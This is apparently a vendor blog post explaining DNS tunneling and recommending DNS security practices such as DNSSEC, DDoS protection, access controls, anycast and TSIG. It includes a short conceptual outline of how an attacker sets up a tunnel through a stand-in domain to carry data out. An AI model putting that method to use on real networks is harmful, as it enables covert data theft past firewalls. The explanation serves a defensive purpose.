Cyber Criminals Can Extract Data and Plant Malware With DNS Tunneling. Here's How

Gerhard Jacobs
February 21, 2019

A secure DNS is a key part of an organization's security posture, protecting both online presence, and internal applications. 

According to a 2018 report by DarkReading, the average cost of a DNS attack globally surged 57% from 2017 to $715,000 in 2018. During that time, organizations faced an average of seven DNS attacks.

These attacks take on many forms and have a variety of objectives. Some, such as DDoS are designed to make DNS unavailable. Others, like cache poisoning, are designed to misdirect users to malicious websites; while others are designed to use DNS as a vector for stealing private data.

The latter has taken center stage as one of the key trends in cybersecurity going forward, and DNS tunneling is an effective cyber attack that bad actors use to get their hands on sensitive data.

In a previous post, we explained what a DNS hijacking attack is, this time around we're looking at DNS tunneling.

What is DNS Tunneling?

In a DNS attack, hackers use protocols like TCP or SSH, encoded within DNS protocol requests, to pass malware or stolen data without being detected by firewalls. While not an attack on DNS, this form of attack can use DNS to get a hold of your data.


In order to carry out a DNS tunneling attack, the compromised system has to have external network connectivity, as hackers would need access to a networked DNS server. Bad actors also need control of a domain and server to act as an authoritative server in order to execute the server-side tunneling and deliver the data payload. 

Why DNS Tunneling Though?

Hackers know that DNS is a commonplace and trusted protocol, and it didn’t take them long to figure out that a lot of organizations don’t examine their DNS traffic for malicious activity. DNS tunneling enables these cybercriminals to insert malware or pass stolen information into DNS queries, creating covert communication channels that bypass most firewalls.

Are all DNS tunneling activities nefarious? Good question… the answer is kinda, but there are exceptions to every rule. What makes this form of attack attractive to hackers, is how easy it is to get hold of tunneling toolkits. You can find a handful online, and they’re so easy to use that hackers don’t necessarily need scorpion-level skills to carry out these attacks. That said, DNS tunneling often makes up part of much larger, more sophisticated attacks; some sponsored or directly carried out by countries.

So, how do they do it?

  1. First off, the hacker gets their hands on a domain… www.immahackyou.com.
  2. Next, they configure the domain’s name servers to their own DNS server
  3. They then delegate a subdomain, such as “tun.immahackyou.com” and configure their machine as the subdomain’s authoritative DNS server.
  4. Any DNS request made by the victim to “{data}.tun.immahackyou.com” will go straight to the hacker’s machine.
  5. Then it’s just a matter of the bad actor’s machine encoding a response that’s routed back to the victim’s machine.
  6. Voila! A bidirectional data transfer channel is set.

DNS Security Best Practices to Help Keep You Safe

Use DNSSEC

Next-generation DNS allows you to implement DNSSEC using “online signing,” and allows you to optimize the end-user experience, manage multiple CDN providers and migrate to the cloud; while ensuring your zones are protected. DNSSEC can also complicate maintaining a redundant, dual DNS architecture. Although modern managed DNS services are designed for high availability, they are not immune from outages. Full or partial outages can result from denial of service attacks, failures in critical network infrastructure, or configuration errors. The result of a DNS outage is that your applications and content are no longer available to users.

DDOS Protection For The DNS Layer

DDoS attacks against DNS infrastructure are common and can result in prolonged outages. If you run your own DNS infrastructure, make sure you:

  • Protect against volumetric DDoS attacks that deny access by overwhelming network links. DDoS protection services can help by absorbing large amounts of malicious traffic upstream from your network links.
  • Protect against application-level DNS attacks, such as the random subdomain attack. There are specialized appliances that provide DNS application layer protections.
  • Overprovision your DNS infrastructure to absorb traffic spikes.

Strong Access Controls for  DNS Administration

Because DNS is a mission-critical service, administrative access to DNS management should be effectively managed. There are several recommended measures for securing administrative access to DNS systems:

  • Strong password enforcement
  • Two-Factor Authentication
  • Role-based access controls (RBAC)
  • Admin session timeouts and forced re-login
  • IP address whitelisting - restricting admin access to trusted sources
  • Single Sign-On (SSO)
  • Activity logging

Leveraging Anycast for High Availability

DNS infrastructure based on the anycast protocol is another way to achieve high availability and resiliency. With anycast, when a DNS recursive resolver sends a query to an authoritative name server, the anycast protocol automatically routes the query to the name server that is the fewest network hops from the resolver. This improves performance and provides a faster and more reliable response in case of name server outage. 

Anycast is a highly resilient routing method. As soon as servers go down, are impacted by DDoS or become unavailable due to global connectivity issues (e.g. a cut fiber or congestion in a certain Internet segment), anycast dynamically diverts DNS requests to an available server.

Implement Redundant DNS

DNS redundancy is now a must-have for many enterprises, but deploying a redundant DNS infrastructure often involves trade-offs in cost, manageability, and performance. You might find yourself cobbling together management of different vendors and settling for minimally viable, common features shared between the vendors.

Secure Zone Transfers with TSIG Authentication

When operating a secondary DNS zone, DNS zone information is frequently copied from primary to secondary server - this is called a zone transfer. Attackers might intercept these communications and use it to inject fake DNS records into secondary DNS servers, as part of a DNS spoofing attack. TSIG (Transaction Signature) is a DNS networking protocol that provides enhanced security for zone transfers. TSIG uses cryptographic shared keys to digitally sign zone data before it is sent to the secondary DNS server. This validates that the source of the zone transfer (the primary DNS server) is legitimate and can be trusted and that the zone transfer itself was not altered in transit.

Outsourcing DNS to an external provider does relieve an organization of some security responsibilities. Ultimately though, IT and security teams should have a basic understanding of DNS security and the best practices for defending DNS from the wide variety of attacks that can be directed at it.

Request a Demo

Contact Us

Get Pricing